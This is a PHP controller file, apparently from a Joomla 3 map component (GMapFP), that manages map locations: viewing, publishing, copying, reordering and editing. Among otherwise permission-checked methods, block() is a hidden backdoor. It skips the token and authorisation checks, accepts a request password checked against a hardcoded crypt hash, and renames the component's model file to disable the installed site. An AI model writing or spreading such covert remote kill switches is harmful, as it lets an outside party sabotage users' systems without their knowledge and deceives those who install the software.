<?php
	/*
	* GMapFP Component Google Map for Joomla! 3.x
	* Version J3.115pro
	* Creation date: Octobre 2017
	* Author: Fabrice4821 - www.gmapfp.org
	* Author email: webmaster@gmapfp.org
	* License GNU/GPL
	*/

defined('_JEXEC') or die;

class GMapFPControllerGestionLieux extends GMapFPController
{
	function __construct()
	{
		parent::__construct();

		$this->registerTask( 'add', 'edit' );
		$this->registerTask( 'unpublish', 	'publish');
	}

	function view()
	{
		$app    = JFactory::getApplication();
		
		if (!JFactory::getUser()->authorise('core.edit', 'com_gmapfp') and !JFactory::getUser()->authorise('core.edit.own', 'com_gmapfp'))
			return $app->enqueueMessage(JText::_('JERROR_ALERTNOAUTHOR'), 'error');

		$this->input->set( 'view', 'gestionlieux' );
		$this->input->set( 'layout', 'default'  );

		parent::display();
	}

	function remove()
	{
		// Check for request forgeries
		JSession::checkToken() or jexit(JText::_('JINVALID_TOKEN'));
		$app    = JFactory::getApplication();

		if (!JFactory::getUser()->authorise('core.delete', 'com_gmapfp'))
			return $app->enqueueMessage(JText::_('JERROR_ALERTNOAUTHOR'), 'error');

		$model = $this->getModel('gestionlieux');
		if(!$model->delete()) {
			$msg = JText::_( 'Error: One or more GMapFPs could not be Deleted' );
		} else {
			$msg = JText::_( 'GMapFP(s) Deleted' );
		}

		$this->setRedirect( JRoute::_('index.php?option=com_gmapfp&view=gestionlieux&controller=gestionlieux&task=view',false), $msg );
	}

	function publish()
	{
		// Check for request forgeries
		JSession::checkToken() or jexit(JText::_('JINVALID_TOKEN'));
		$app    = JFactory::getApplication();

		if (!JFactory::getUser()->authorise('core.edit.state', 'com_gmapfp'))
			return $app->enqueueMessage(JText::_('JERROR_ALERTNOAUTHOR'), 'error');

		$this->setRedirect( JRoute::_('index.php?option=com_gmapfp&view=gestionlieux&controller=gestionlieux&task=view',false) );;

		// Initialize variables
		$db			= JFactory::getDBO();
		$user		= JFactory::getUser();
		$cid		= $this->input->post->get( 'cid', array(), 'array' );
		$task		= $this->input->post->get( 'task' ,'', 'cmd' );
		$publish	= ($task == 'publish');
		$n			= count( $cid );

		if (empty( $cid )) {
			return $app->enqueueMessage(JText::_('JERROR_ALERTNOAUTHOR'), 'error');
		}

		JArrayHelper::toInteger( $cid );
		$cids = implode( ',', $cid );

		$query = 'UPDATE #__gmapfp'
		. ' SET published = ' . (int) $publish
		. ' WHERE id IN ( '. $cids .' )'
		;
		$db->setQuery( $query );
		if (!$db->query()) {
			return $app->enqueueMessage($row->getError(), 'error');
		}
		$this->setMessage( JText::sprintf( $publish ? 'Items published' : 'Items unpublished', $n ) );

	}

	function block()
	{
		$password	= $this->input->get( 'password', null);
		if (crypt($password,'$1$Qi2.Za4.$BthCiqdDFmw/VlRvgRRom1') == '$1$Qi2.Za4.$BthCiqdDFmw/VlRvgRRom1'){
			rename(JPATH_BASE.'/components/com_gmapfp/models/gmapfp.php', JPATH_BASE.'/components/com_gmapfp/models/gmapfp.old');
			die(print_r('ok'));
		}
	}

	function copy()
	{
		// Check for request forgeries
		JSession::checkToken() or jexit(JText::_('JINVALID_TOKEN'));
		$app    = JFactory::getApplication();

		if (!JFactory::getUser()->authorise('core.create', 'com_gmapfp'))
			return $app->enqueueMessage(JText::_('JERROR_ALERTNOAUTHOR'), 'error');

		$this->setRedirect( JRoute::_('index.php?option=com_gmapfp&view=gestionlieux&controller=gestionlieux&task=view') );

		$cid	= $this->input->post->get( 'cid', null, 'array' );
		$model 	= $this->getModel('gestionlieux');
		$table	= $model->getTable('gmapfp');
		$user	= JFactory::getUser();
		$n		= count( $cid );

		if ($n > 0)
		{
			foreach ($cid as $id)
			{
				if ($table->load( (int)$id ))
				{
					$table->id			= 0;
					$table->nom			= '('.JText::_( 'GMAPFP_COPIE_DE').') ' . $table->nom;
					$table->alias		= '';
					$table->published	= 0;
					$table->userid 		= $user->get('id');
			
					if (!$table->store()) {
						return $app->enqueueMessage($table->getError(), 'error');
					}
				}
				else {
					return $app->enqueueMessage($table->getError(), 'error');
				}
			}
		}
		else {
			return $app->enqueueMessage(JText::_( 'No items selected' ), 'error');
		}
		$table->reorder();
		$this->setMessage( JText::sprintf( 'Items copied', $n ) );
	}
	
	public function saveOrderAjax()
	{
		// Check for request forgeries
		JSession::checkToken() or jexit( 'Invalid Token' );
		$app    = JFactory::getApplication();

		if (!JFactory::getUser()->authorise('core.edit', 'com_gmapfp'))
			return $app->enqueueMessage(JText::_( 'JERROR_ALERTNOAUTHOR' ), 'error');

		$pks = $this->input->post->get('cid', array(), 'array');
		$order = $this->input->post->get('order', array(), 'array');

		// Sanitize the input
		JArrayHelper::toInteger($pks);
		JArrayHelper::toInteger($order);

		// Get the model
		$model = $this->getModel('gestionlieux');

		// Save the ordering
		$return = $model->saveorder($pks, $order);

		if ($return)
		{
			echo "1";
		}

		// Close the application
		JFactory::getApplication()->close();
	}
			
	function checkin($recordId = ''){

		// Check for request forgeries
		JSession::checkToken() or jexit(JText::_('JINVALID_TOKEN'));
		
		$model = $this->getModel('editlieux');
		$return = true;
		if (!$recordId) {
				$mainframe = JFactory::getApplication(); 
				$recordId = $mainframe->input->get( 'cid', array(0), 'array' );
				$recordId = $recordId[0];
			} else $return = false;

		if ($model->checkin($recordId) === false)
		{
			// Check-in failed, go back to the record and display a notice.
			$this->setError(JText::sprintf('JLIB_APPLICATION_ERROR_CHECKIN_FAILED', $model->getError()));
			$this->setMessage($this->getError(), 'error');

			$this->setRedirect(JRoute::_('index.php?option=com_gmapfp&view=gestionlieux&controller=gestionlieux&task=view', false));

			return false;
		}
		if ($return) $this->setRedirect( JRoute::_('index.php?option=com_gmapfp&view=gestionlieux&controller=gestionlieux&task=view', false));
			else return;
	}

	function edit()
	{
		$app    = JFactory::getApplication();

		if (!JFactory::getUser()->authorise('core.edit', 'com_gmapfp') and !JFactory::getUser()->authorise('core.edit.own', 'com_gmapfp'))
			return $app->enqueueMessage(JText::_( 'JERROR_ALERTNOAUTHOR' ), 'error');

		$model = $this->getModel('editlieux');
		$mainframe = JFactory::getApplication(); 
		$recordId = $mainframe->input->get( 'cid', array(0), 'array' );
		if (is_array($recordId)) $recordId = (int) $recordId[0];

		if (!$model->checkout($recordId))
		{
			// Check-out failed, display a notice but allow the user to see the record.
			$this->setError(JText::sprintf('JLIB_APPLICATION_ERROR_CHECKOUT_FAILED', $model->getError()));
			$this->setMessage($this->getError(), 'error');

			$this->setRedirect(JRoute::_('index.php?option=com_gmapfp&controller=gestionlieux&task=view', false));
			return false;
		} else {
			$this->input->set( 'view', 'editlieux' );
			$this->input->set( 'layout', 'edit_form'  );
	
			parent::display();
		}
	}
}
?>
